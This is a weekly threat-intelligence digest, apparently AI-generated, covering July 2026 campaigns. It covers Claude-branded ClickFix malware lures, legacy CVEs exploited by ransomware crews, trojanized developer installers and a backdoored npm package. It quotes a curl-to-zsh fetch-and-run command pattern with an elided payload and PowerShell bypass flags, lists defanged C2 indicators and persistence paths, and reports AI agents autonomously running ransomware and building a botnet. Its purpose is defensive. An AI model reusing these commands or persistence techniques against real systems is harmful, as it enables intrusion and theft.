Weekly Threat Intel
July 10–17, 2026
-
Treat any Claude-branded ClickFix lure as a confirmed, scaling malware delivery channel.
MacSync Stealer (220 IOCs) used 170+ throwaway domains behind Claude-doc-styled pages; ClickLock reused a fake
claudecodedoc.squarespace.compage. Alert on paste-to-terminal execution regardless of which trusted brand the lure impersonates — the command pattern is the durable signal. -
Patch and hunt legacy CVEs — Log4Shell and 2021-era Ivanti/Citrix bugs still power ransomware.
Qilin, INC, Safepay, Medusa, DragonForce, InterLock, and Rhysida all rode years-old, still-exploitable vulnerabilities into a U.S. government target in a single report spanning 34 CVEs. If any of them are open on your perimeter, prioritize patching today.
-
Build detections for AI-operated attack tooling that writes, deploys, and debugs its own C2.
Patriot Bait used an AI agent to architect and run a full C2 botnet, and JADEPUFFER executed a fully autonomous, LLM-driven ransomware operation against exposed Langflow and Nacos servers. Signature-based tools lag these rapidly-iterated, self-modifying payloads.
-
Verify installer hashes — trojanized MobaXterm, WebEx, DBeaver, and Faceit clones now deliver RATs.
UAT-11795 hid Starland RAT and a bespoke WLDR C2 implant inside convincingly renamed installers aimed at technical staff in the U.S. and Europe. Check hashes before running any tool downloaded outside an official channel.
-
Monitor egress for Nostr, IPFS, and DHT traffic — new resilient C2 fallback channels.
A backdoored AsyncAPI npm package used Nostr relays and BitTorrent DHT bootstrap nodes as C2 fallback infrastructure that survives domain takedowns. Standard blocklists miss this traffic; watch for P2P/decentralized-protocol connections from build and CI systems.
-
Rotate credentials and hunt webshells on any aging government CMS, portal, or webmail software.
PhantomEnigma compromised roughly 20 Brazilian municipal and state government sites to host a Node.js backdoor, while GoSerpent and UNK_MassTraction separately hit Southeast Asian government and university targets. Compromised legitimate infrastructure remains the preferred delivery vector.
-
Disable Outlook VBA auto-load and flag unexpected filen.io traffic — a live APT28 signature.
APT28 exploited a new Microsoft Office CVE (
CVE-2026-21509) and abusedfilen.iocloud storage for BEARDSHELL/NotDoor C2, while a separate campaign ran winter-timed LNK phishing against energy infrastructure. Both rely on macro and cloud-storage abuse that's detectable if you're watching for it.
- Top Story: ClickFix's Claude-Brand Impersonation Triples Down
- Legacy CVEs Never Die: A 34-CVE Free-for-All Against U.S. Government
- Autonomous AI Attacks Arrive: Agentic Ransomware and an AI-Operated Botnet
- China-Nexus Pressure Continues: ORB Expansion and Hijacked Government Sites
- Russia-Nexus: APT28's New CVE and Winter-Timed Energy Espionage
- Trojanized Developer Tools and a Supply-Chain Backdoor's Novel C2
- Also Worth Tracking: Extortion, PhaaS, Scams, and Cloud Hardening
ClickFix's Claude-Brand Impersonation Triples Down
Last week's report of ClickFix lures abusing claude.ai shared-chat links to distribute MacSync stealer wasn't a one-off — it was the leading edge of a trend. This week brought three distinct campaigns built around the same idea: borrow the trust users place in Claude and Claude Code to get them to paste an attacker's command into a terminal.
Zscaler Names "ClaudeFix": 170+ Domains Behind a Fake Claude Verification Page
Zscaler's largest report of the week (220 IOCs) tracked threat actors running curl -kfsSL $(echo '[base64]'|base64 -D)|zsh ClickFix commands from a network of 170+ throwaway hosting domains disguised as small-business sites (lasvegaslaminateflooring[.]com, miamipcsupport[.]com, centralfloridapowerwash[.]com). Victims land on a page styled to look like Claude output, then run a command that drops MacSync Stealer, exfiltrates browser, keychain, and file data into osalogging.zip, and persists via ~/.zshrc. Fake Ledger, Ledger Live, and Trezor Suite "wallet fix" payloads are staged from the same infrastructure for crypto-focused follow-on theft.
ClickLock Reuses a Fake "Claude Code Docs" Page and Compromised WordPress Sites
Group-IB documented ClickLock Stealer (34 IOCs) distributed through a lookalike claudecodedoc.squarespace[.]com page and a companion macclean.craft[.]me site, both funneling into compromised WordPress infrastructure (panalobet[.]ph, store.grafsynergy[.]com, cottonbox[.]co[.]il) hosting modular keychain, credential, and crypto-wallet stealer components alongside a GSocket backdoor. Persistence rides LaunchAgents disguised as system components (com.authirity.plist, com.chromer.plist) inside a hidden ~/.cacheb/ working directory.
TELEPUZ Malware-as-a-Service Rides the Same ClickFix Pattern to Windows
Elastic's TELEPUZ report (78 IOCs) shows the technique isn't macOS-only: a PowerShell ClickFix one-liner (-NoP -w h -ep bypass -c) fetches a Vidar Go variant from memshowblob[.]forum, then stages the modular TELEPUZ MaaS platform from dozens of typo-cluster domains (hardendom[.]shop, hardeneddom[.]shop, hardendedom[.]shop) — evidence of automated domain generation. WebSocket C2 falls back to a Telegram channel and a Steam Community profile if primary infrastructure is seized.
ClickFix operators have identified that impersonating a trusted AI brand increases click-through, and they are now running it as a repeatable playbook across platforms. All three campaigns share the same core weakness they exploit: a user who believes they're following a legitimate fix or verification step will paste and run almost anything. None of the domains or hosting infrastructure here are durable — treat them as disposable and focus detection on the behavior. Alert on any shell or PowerShell process launched within seconds of clipboard activity in a browser, on curl | zsh and curl | sh pipelines, and on base64-decoded command execution regardless of what page the user was just looking at.
Legacy CVEs Never Die: A 34-CVE Free-for-All Against U.S. Government
A single report this week — "Storming the Capitol Network," an analysis of threats to the U.S. government sector — catalogued 34 distinct CVEs spanning nearly a decade, from a 2017 Huawei router RCE to fresh 2025/2026 Ivanti and Citrix bugs, all still being actively weaponized. It's less a single incident than a snapshot of accumulated patch debt feeding an entire ransomware ecosystem.
| Vulnerability Era | Representative CVEs | Products Affected |
|---|---|---|
| 2017–2021 legacy debt | CVE-2017-17215, CVE-2021-26855/26857/26858/27065 (ProxyLogon), CVE-2021-44228 (Log4Shell) |
Huawei HG532, Exchange, Log4j |
| 2022–2023 edge/appliance wave | CVE-2022-42475, CVE-2022-26134, CVE-2023-3519, CVE-2023-20198/20273, CVE-2023-34048, CVE-2023-46805 |
FortiOS, Confluence, Citrix NetScaler, Cisco IOS XE, VMware vCenter, Ivanti Connect Secure |
| 2024 access-broker favorites | CVE-2024-3400, CVE-2024-8956/8957, CVE-2024-12356/12686, CVE-2024-21412/21762/21887/21893 |
PAN-OS, PTZOptics cameras, BeyondTrust, Ivanti CS, FortiOS SSL-VPN |
| 2025–2026 fresh exploitation | CVE-2025-5777 (CitrixBleed 2), CVE-2025-0282, CVE-2025-31324, CVE-2025-61882, CVE-2025-20333/20362, CVE-2025-29824, CVE-2026-1281 |
Citrix, Ivanti, SAP NetWeaver, Oracle EBS, Cisco Secure Firewall, Windows CLFS, Ivanti EPMM |
Seven Ransomware Families Share One Government Target and a Common Root Cause
The report ties payload hashes from Qilin, INC, Safepay, Medusa, DragonForce, InterLock, and Rhysida — plus commodity loaders AsyncRAT, Rhadamanthys, Lumma, StealC, Vidar, and ValleyRAT, and the China-nexus BRICKSTORM backdoor — to the same 34-CVE exploitation landscape against a U.S. government sector target. Each ransomware crew maintains its own Tor leak site (Qilin's and Safepay's onion addresses are both listed) and ransom-note naming convention, but all of them are entering through the same category of unpatched, internet-facing appliance.
The lesson isn't a new exploit — it's that a government network carrying eight years of unpatched edge devices is now a shared hunting ground for every ransomware crew simultaneously. None of these CVEs are novel; several have public patches years old. Prioritize remediation by exposure and confirmed in-the-wild status rather than CVSS score alone, and assume that any device left unpatched this long has already been probed by more than one actor. After patching, hunt for the ransom-note filenames and payload hashes listed here on any historically exposed system — the exploit window may already have closed while an implant remained.
Autonomous AI Attacks Arrive: Agentic Ransomware and an AI-Operated Botnet
Last week's digest closed with AI being weaponized as a lure and targeted with prompt injection against analysts. This week moves a step further: two reports describe AI directly operating offensive infrastructure, rather than merely appearing in it.
JADEPUFFER Runs an LLM-Driven Ransomware Operation Start to Finish
JADEPUFFER (14 IOCs) is described as fully autonomous, LLM-driven ransomware that exploits Langflow (CVE-2025-3248) and Alibaba Nacos (CVE-2021-29441) to harvest credentials, stage them (/tmp/creds.json), encrypt configuration files, and destroy MySQL databases via test/cleanup marker files (_pwn_test.txt, _pwn_cleanup.txt) — all without a human operator directing each step. A C2 beacon on 45[.]131[.]66[.]106:4444 and a ProtonMail contact address round out an otherwise minimal, disposable footprint.
CVE-2025-3248 / CVE-2021-29441 · Autonomous credential harvest → encrypt → DB destructionPatriot Bait's Operator Used an AI Agent to Build and Debug Its Own Botnet
Trend Micro traced a Russian-speaking actor using an AI agent to design, code, deploy, and iteratively debug a command-and-control botnet (11 IOCs), disguising its persistence as svchost.exe under %APPDATA%\Microsoft\Windows\Runtime\ and a spoofed WindowsUpdateManager registry run key. The notable shift here isn't the botnet's capability — it's that the AI agent handled the engineering workload end-to-end, compressing what used to be a multi-person development effort into a single operator's prompt session.
svchost.exe masquerade · Registry run-key persistenceBoth cases point to the same emerging reality: the barrier between "having an idea for an attack" and "having a working attack" is collapsing, because the AI can now do the engineering. JADEPUFFER shows this at the operational level — a ransomware campaign that runs its full kill chain without human-in-the-loop decisions — while Patriot Bait shows it at the development level, where an agent replaces the coding and debugging work a threat actor would otherwise need real skill to perform. Defenses built around the assumption that malware quality correlates with actor sophistication need revisiting; a low-skill actor with API access to a capable model can now field tooling that previously required a team.
China-Nexus Pressure Continues: ORB Expansion and Hijacked Government Sites
Following last week's report on UAT-7810 building Operational Relay Box (ORB) networks, this week brought a direct continuation plus two additional China-nexus campaigns hitting government and diplomatic targets through compromised legitimate infrastructure rather than novel exploits.
UAT-7810 Keeps Growing Its ORB Network on Ruckus and ASUS Devices
UAT-7810 continued expanding its malware arsenal (103 IOCs) by exploiting older Ruckus wireless flaws (CVE-2020-22653/22658, CVE-2023-25717) and an ASUS AiCloud bug (CVE-2025-2492) to recruit more devices into its ORB relay infrastructure, with C2 concentrated on a handful of IPs (194[.]233[.]92[.]26, 217[.]15[.]160[.]247, 217[.]15[.]164[.]147) across multiple non-standard ports. The pattern from last week holds: unpatched consumer/SOHO networking gear keeps becoming disposable, hard-to-attribute relay infrastructure for nation-state traffic.
PhantomEnigma Hijacks Roughly Twenty Brazilian Government Websites
Any.Run's PhantomEnigma report (91 IOCs) documents a campaign abusing police-themed lure documents and roughly twenty compromised Brazilian municipal, state, and judicial sites (camaraparaguacu.sp.gov[.]br, circ.rs.gov[.]br, portaldrh.tjba.jus[.]br, and others) to distribute a modular Node.js backdoor targeting banking and public-sector organizations, backed by a Cobalt Strike/Shellter loader for follow-on access. The reliance on legitimate .gov.br infrastructure for delivery defeats domain-reputation filtering outright.
.gov.br/.jus.br sites · Node.js backdoor · Cobalt Strike/Shellter loaderGoSerpent Hits Southeast Asian Diplomats While UNK_MassTraction Pivots Through Universities
Securelist's GoSerpent campaign (30 IOCs) targets Southeast Asian government and diplomatic entities with a Go-based RAT, the Stowaway proxy tool, and TmcLoader, hiding secret keys behind decoy strings like www.microsoft.com and www.spacex.com. Separately, UNK_MassTraction (16 IOCs) chained Roundcube n-day bugs (CVE-2024-42009, CVE-2025-49113) to pivot into university networks via the SquareShell webshell and a SNOWLIGHT-style loader, deploying the IceCube stealer and VShell backdoor.
Four separate China-nexus reports in one week, none relying on a fresh zero-day, confirm that compromised legitimate infrastructure — routers, government CMS platforms, webmail servers — remains the preferred and most productive delivery layer. Every case here defeats reputation-based blocking by riding on infrastructure that was trustworthy until it wasn't. Defenders running Roundcube, exposed Ruckus/ASUS devices, or public-facing government portals should treat "still on an old, patched-late version" as an active risk indicator, and government IT teams especially should audit for the webshell and backdoor filenames named across these reports.
Russia-Nexus: APT28's New CVE and Winter-Timed Energy Espionage
Two StrikeReady reports this week track distinct but related Russia-nexus operations: one built around a brand-new Microsoft Office vulnerability, the other a longer-running energy-sector espionage effort timed to winter heating-season stakes.
APT28 Debuts a New Office CVE and Abuses filen.io Cloud Storage for C2
APT28 launched a spear-phishing campaign (95 IOCs) exploiting CVE-2026-21509 in Microsoft Office, delivering malicious .doc lures themed around Ukraine, Bolivia, Romania, and Syria-related "consultation" topics. The chain drops BEARDSHELL (EhStoreShell.dll via COM hijacking) and NotDoor (VbaProject.OTM, abusing Outlook macro security settings), and uses compromised filen.io cloud-storage accounts as a C2 channel — a service unlikely to be blocked by default in most environments.
CVE-2026-21509 · BEARDSHELL (COM hijack) + NotDoor (Outlook macro) · filen.io C2A Winter-Timed Phishing Wave Targets Energy Infrastructure With Gas-Leak and Conference Lures
A separate StrikeReady report (58 IOCs) traces a Russia-nexus campaign against energy infrastructure using malicious LNK files disguised as gas-leak notices (Заява про витік газу ТОВ ОПЕРАТОР ГТС УКРАЇНИ.pdf.lnk) and industry-conference registration forms, staged from compromised WordPress sites (ertel-audit[.]com, afi-ukraine[.]org) and a dedicated payload host (gurt.duna[.]ua). The timing and targeting — Ukrainian gas infrastructure ahead of winter — mirrors prior years' pattern of energy-sector espionage tied to heating-season leverage.
Two independent Russia-nexus operations against Ukraine-adjacent targets in the same week, one brand-new and one recurring, signal sustained investment regardless of which CVE or lure happens to be current. Disable Outlook's LoadMacroProviderOnBoot and monitor the Security\Level registry value defenders can check directly; treat unexpected filen.io traffic from endpoints as suspicious by default; and for energy-sector defenders specifically, apply heightened scrutiny to LNK attachments and conference-registration lures through the winter months.
Trojanized Developer Tools and a Supply-Chain Backdoor's Novel C2
Two reports this week target the developer and DevOps toolchain directly — one through fake installers of everyday utilities, the other through a compromised npm publishing pipeline with an unusually resilient C2 design.
Starland RAT Hides Inside Trojanized MobaXterm, WebEx, DBeaver, and Faceit Installers
Cisco Talos's UAT-11795 reporting (86 IOCs, plus a corroborating 34-IOC follow-up published alongside a "Patch Wars" Patch Tuesday roundup) details a financially motivated campaign trojanizing common technical tools — MobaXterm_v26.1.exe, WebEx_Client.exe, dbeaver-ce-windows-x86_64.exe, FaceitInstaller_x64.exe — to deliver a novel Starland RAT and a bespoke WLDR C2 implant against U.S. and European targets. The malware runs extensive host and domain reconnaissance (whoami /all, AV product enumeration, domain controller lookups) before falling back to polygon-rpc[.]com as a resilient RPC-based C2 fallback.
Five Backdoored AsyncAPI Packages Fall Back to Nostr Relays and BitTorrent DHT for C2
Aikido Security found five AsyncAPI npm packages (@asyncapi/specs, @asyncapi/generator, and three related packages, 34 IOCs) backdoored via a compromised GitHub Actions pipeline, dropping a persistent implant (miasma-monitor) via both a Windows registry run key and a Linux systemd user service. Its most notable feature is C2 resilience: primary C2 sits on 85[.]137[.]53[.]71, but fallback discovery uses Nostr relays (wss://relay.damus.io), an IPFS-hosted payload, and BitTorrent DHT bootstrap nodes — decentralized protocols with no single domain or IP to take down.
miasma-monitor implant · Nostr/IPFS/DHT fallback C2Both cases target the trust developers place in their own tooling, and the AsyncAPI case in particular shows attackers designing for takedown resistance from the start. Pin and verify hashes for any installer or package outside a locked-down internal mirror, especially ones bearing the names of common technical utilities. For the AsyncAPI-style C2 pattern, egress monitoring needs to extend beyond domain/IP blocklists to protocol-level detection — unexpected WebSocket connections to Nostr relay hostnames, IPFS gateway fetches, or DHT bootstrap traffic from a build server or CI runner has essentially no legitimate use case.
Also Worth Tracking: Extortion, PhaaS, Scams, and Cloud Hardening
Coinbase Cartel Extorts Without Ever Touching Encryption
A small but notable report (3 IOCs) profiles Coinbase Cartel, a financially motivated group that exfiltrates data using compromised credentials and extorts victims purely on the threat of disclosure via a Tor leak site — no ransomware payload involved. It's a reminder that backup and recovery posture provides zero protection against the growing data-theft-only extortion model.
Kratos PhaaS Iterates Through Three Kit Versions Targeting M365 Credentials
Any.Run profiled Kratos (49 IOCs), a mature Phishing-as-a-Service kit targeting Microsoft 365 users across the US and Europe with anti-bot checks and convincing login.microsoftonline.com lookalike pages, tracked across three evolving kit versions (V0/V1/V2) with distinct exfiltration endpoints (mini.php, next.php, save.php) and a long list of rotating lure domains.
A Sprawling Fake-Ticketing Operation and a Google Cloud Run Hardening Guide
Group-IB mapped a fake Celine Dion concert ticketing operation (61 IOCs) spanning 30+ typosquat domains impersonating Ticketmaster and official venues, complete with fake OAuth login flows for payment capture. Separately, Google Cloud published hardening guidance (20 IOCs) after finding LFI and command-injection risk in exposed Cloud Run services, including SSRF against the GCP metadata endpoint to steal service-account tokens.
OkoBot Chains TookPS and SSH Tunnels to Reach Crypto Wallets
Securelist's OkoBot report (48 IOCs) details a modular framework using the TookPS loader for initial infection, SSH tunnels for payload delivery via a custom HDUtil.exe tool, and dedicated plugins (SeedHunter, keylogger, browser-hook DLLs for Chrome/Edge) aimed squarely at cryptocurrency users, with RDP-patching capability (termsrv.dll) to enable concurrent remote sessions on victim machines.
termsrv.dll for concurrent RDPNone of this week's secondary stories needed a novel technique — they scaled existing ones: more PhaaS kit iterations, more typosquat ticketing domains, more crypto-targeting plugins. The consistent defensive answer across all of them is the same one that applies to the week's bigger stories: verify before you trust a brand, a login page, or an installer, and assume that infrastructure behind a familiar name may not be what it claims.
Analyst Assessment: July 10–17 in Context
The defining pattern of this week is escalation, not novelty. ClickFix's abuse of the Claude brand went from a single malvertising case last week to three parallel campaigns and the week's largest report, confirming that once a lure format proves effective, it gets industrialized fast. Similarly, the 34-CVE government report isn't a new discovery — it's a reminder that unpatched, years-old vulnerabilities remain the primary fuel for an entire ransomware ecosystem, with seven distinct crews drawing on the same exploitation landscape.
The most consequential shift is the arrival of AI as attack operator rather than attack subject. JADEPUFFER's fully autonomous ransomware kill chain and Patriot Bait's AI-engineered C2 botnet both demonstrate that the skill and labor bottleneck for running an intrusion is shrinking. This doesn't necessarily mean more sophisticated attacks — both observed cases used known vulnerabilities and conventional techniques — but it does mean more attackers can field working tooling faster, and defenders should expect intrusion volume, not just intrusion novelty, to rise as a result.
Nation-state activity continued at a steady cadence rather than a surge. China-nexus operators kept expanding existing ORB infrastructure and hit government/diplomatic/academic targets through compromised legitimate platforms; Russia-nexus APT28 paired a new Office CVE with old tradecraft (Outlook macro abuse, cloud-storage C2) and a parallel energy-sector campaign ran on winter-timing logic seen in prior years. None of this represents a change in adversary intent, only continuity.
What to do now: (1) Alert on shell/PowerShell execution immediately following browser clipboard activity, regardless of what brand or verification step the page claims to represent. (2) Patch the 34 CVEs referenced in this week's government report by exposure and confirmed exploitation status, then hunt for the ransomware families and loaders listed above on any historically exposed system. (3) Build a threat model for AI-operated attack tooling — assume payloads can now be authored, iterated, and debugged without a human in the loop, and don't assume unsophisticated actors are capacity-limited. (4) Verify hashes on any developer tool installer (MobaXterm, WebEx, DBeaver, Faceit and similar) obtained outside an official channel or internal mirror. (5) Extend egress monitoring past domain/IP blocklists to cover Nostr, IPFS, and DHT protocol traffic from build and CI systems. (6) Rotate credentials and hunt webshells on any internet-facing government CMS, webmail (Roundcube), or portal software running behind on patches. (7) Disable Outlook's LoadMacroProviderOnBoot registry setting and monitor for unexpected filen.io traffic as a live APT28 indicator.
Sources
- Zscaler ThreatLabz — "ClaudeFix": Shared Claude Chats Meet ClickFix (MacSync Stealer)
- Group-IB — ClickLock Stealer: New macOS Malware via Fake Claude Docs
- Elastic Security Labs — TELEPUZ: Modular MaaS Malware via CLICKFIX-VIDAR
- Threat Intelligence Report — Storming the Capitol Network: Nation-State Ops Against the USA Government
- Threat Intelligence Report — JADEPUFFER Ransomware Just Went Fully Autonomous
- Trend Micro — Actor Behind Patriot Bait Used AI to Deploy a C2 Botnet
- Threat Intelligence Report — UAT-7810 Expands Malware Arsenal on Ruckus and ASUS Devices
- Any.Run — PhantomEnigma: Hijacked Brazilian Government Websites
- Kaspersky Securelist — GoSerpent Backdoor in Southeast Asia
- Threat Intelligence Report — UNK_MassTraction Chains Roundcube N-Days to Pivot Into University Networks
- StrikeReady — APT28's Campaign Leveraging CVE-2026-21509 and Cloud C2 Infrastructure
- StrikeReady — Russia-Nexus APT Targeting Energy Infrastructure (Unknown Unknowns, Part 3)
- Cisco Talos — UAT-11795 Deploys Novel Starland RAT and Bespoke WLDR C2 Implant
- Cisco Talos — Begun, the Patch Wars Have (Patch Tuesday Roundup + UAT-11795 Follow-Up)
- Aikido Security — AsyncAPI npm Packages Backdoored via GitHub Actions
- Threat Intelligence Report — Coinbase Cartel: The Encryption-Free Data Extortion Group
- Any.Run — Kratos PhaaS Targets US and EU Account Takeover
- Group-IB — Fake Celine Dion Concert Ticket Scam
- Google Cloud Threat Intelligence — Exposed Cloud Functions: Risks and Hardening Guidance
- Kaspersky Securelist — OkoBot Framework Targets Cryptocurrency Wallets
- Elastic Security Labs — Contagious Interview: Malware Hidden in SVG Steganography
- Check Point Research — Cavern Manticore: Exposing an Iran-Linked Modular C2 Framework
This digest was generated with Claude by Anthropic, based on source reporting from the publications listed above and analysis of 22 IOC submissions to iocget.com between July 10 and July 17, 2026.